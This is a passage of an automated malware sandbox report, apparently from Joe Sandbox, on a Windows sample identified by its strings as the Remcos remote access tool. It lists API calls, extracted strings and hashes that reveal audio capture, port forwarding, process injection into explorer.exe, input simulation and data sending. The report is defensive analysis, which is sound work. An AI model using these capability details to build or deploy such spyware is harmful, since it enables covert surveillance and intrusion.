                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: DisplayName$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                • API String ID: 1332880857-3614651759
                                • Opcode ID: 1a8a8a53396f0a73c7c7ebd617f4a58ea8be179d7647117c14ca7f9aabbf758a
                                • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                • Opcode Fuzzy Hash: 1a8a8a53396f0a73c7c7ebd617f4a58ea8be179d7647117c14ca7f9aabbf758a
                                • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Eventinet_ntoa
                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                • API String ID: 3578746661-3604713145
                                • Opcode ID: 17cf8a492e2e01fb16bba24d2f661c5d0ec595d5f822586ab64a53fc84a2cb20
                                • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                • Opcode Fuzzy Hash: 17cf8a492e2e01fb16bba24d2f661c5d0ec595d5f822586ab64a53fc84a2cb20
                                • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                  • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                • Sleep.KERNEL32(00000064), ref: 00417521
                                • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                Strings
                                Yara matches
                                Similarity
                                • API ID: File$CreateDeleteExecuteShellSleep
                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                • API String ID: 1462127192-2001430897
                                • Opcode ID: 8036abd7ebb146444e02fef837d9d56b0e439923b7ca1e678c0d610ff0acf444
                                • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                • Opcode Fuzzy Hash: 8036abd7ebb146444e02fef837d9d56b0e439923b7ca1e678c0d610ff0acf444
                                • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 004073DD
                                • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\Desktop\xi0TpAxHGMsm.exe), ref: 0040749E
                                Strings
                                Yara matches
                                Similarity
                                • API ID: CurrentProcess
                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                • API String ID: 2050909247-4242073005
                                • Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                • Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _strftime.LIBCMT ref: 00401D50
                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                Strings
                                Yara matches
                                Similarity
                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                • API String ID: 3809562944-243156785
                                • Opcode ID: ea46db1a35f2c9a2b045b3db18ee993060b77fd334bfa98162aa65f0038d2e9b
                                • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                • Opcode Fuzzy Hash: ea46db1a35f2c9a2b045b3db18ee993060b77fd334bfa98162aa65f0038d2e9b
                                • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                • waveInStart.WINMM ref: 00401CFE
                                Strings
                                Yara matches
                                Similarity
                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                • String ID: dMG$|MG$PG
                                • API String ID: 1356121797-532278878
                                • Opcode ID: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                • Opcode Fuzzy Hash: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                  • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                  • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                  • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                • TranslateMessage.USER32(?), ref: 0041D4E9
                                • DispatchMessageA.USER32(?), ref: 0041D4F3
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                • String ID: Remcos
                                • API String ID: 1970332568-165870891
                                • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • _memcmp.LIBVCRUNTIME ref: 00445423
                                • _free.LIBCMT ref: 00445494
                                • _free.LIBCMT ref: 004454AD
                                • _free.LIBCMT ref: 004454DF
                                • _free.LIBCMT ref: 004454E8
                                • _free.LIBCMT ref: 004454F4
                                Strings
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast$_abort_memcmp
                                • String ID: C
                                • API String ID: 1679612858-1037565863
                                • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tcp$udp
                                • API String ID: 0-3725065008
                                • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                • ExitThread.KERNEL32 ref: 004018F6
                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                Strings
                                Yara matches
                                Similarity
                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                • String ID: PkG$XMG$NG$NG
                                • API String ID: 1649129571-3151166067
                                • Opcode ID: 9c2ec7c6c1b83300b5a1babe596ab5da8c82b5281600b6710d8cb2eac7fb3d8e
                                • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                • Opcode Fuzzy Hash: 9c2ec7c6c1b83300b5a1babe596ab5da8c82b5281600b6710d8cb2eac7fb3d8e
                                • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                  • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                  • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                Strings
                                Yara matches
                                Similarity
                                • API ID: CloseEnumInfoOpenQuerysend
                                • String ID: hdF$xUG$NG$NG$TG
                                • API String ID: 3114080316-2774981958
                                • Opcode ID: 35714dc05fda5d1296540c86bd6bb2644e4a9f23417242c8ef15295d75bc172c
                                • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                • Opcode Fuzzy Hash: 35714dc05fda5d1296540c86bd6bb2644e4a9f23417242c8ef15295d75bc172c
                                • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                Strings
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                • String ID: .part
                                • API String ID: 1303771098-3499674018
                                • Opcode ID: 975fc53f1639f69eb3a9726ed75faab28c63d052f2da129a73f847dad2aea02b
                                • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                • Opcode Fuzzy Hash: 975fc53f1639f69eb3a9726ed75faab28c63d052f2da129a73f847dad2aea02b
                                • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Console$Window$AllocOutputShow
                                • String ID: Remcos v$4.9.3 Pro$CONOUT$
                                • API String ID: 4067487056-3419043855
                                • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: C:\Users\user\Desktop\xi0TpAxHGMsm.exe$Pj$Rmc-4QQORA$hdF
                                • API String ID: 0-4010350062
                                • Opcode ID: a134d68e00a23aec850ce34bab2ba566fca7fbefa287618f70ce8b1be92ee060
                                • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                • Opcode Fuzzy Hash: a134d68e00a23aec850ce34bab2ba566fca7fbefa287618f70ce8b1be92ee060
                                • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                • __freea.LIBCMT ref: 0044AE30
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • __freea.LIBCMT ref: 0044AE39
                                • __freea.LIBCMT ref: 0044AE5E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                • String ID:
                                • API String ID: 3864826663-0
                                • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InputSend
                                • String ID:
                                • API String ID: 3431551938-0
                                • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: __freea$__alloca_probe_16_free
                                • String ID: a/p$am/pm$zD
                                • API String ID: 2936374016-2723203690
                                • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Enum$InfoQueryValue
                                • String ID: [regsplt]$xUG$TG
                                • API String ID: 3554306468-1165877943
                                • Opcode ID: 33c7f91080d72b7d6eae4ad8ea9185415ff74703dc449a1b63b856fadc20d013
                                • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                • Opcode Fuzzy Hash: 33c7f91080d72b7d6eae4ad8ea9185415ff74703dc449a1b63b856fadc20d013
                                • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                • __fassign.LIBCMT ref: 0044B479
                                • __fassign.LIBCMT ref: 0044B494
                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                                • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID: D[E$D[E
                                • API String ID: 269201875-3695742444
                                • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                  • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                  • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                • _wcslen.LIBCMT ref: 0041B763
                                Strings
                                Memory Dump Source
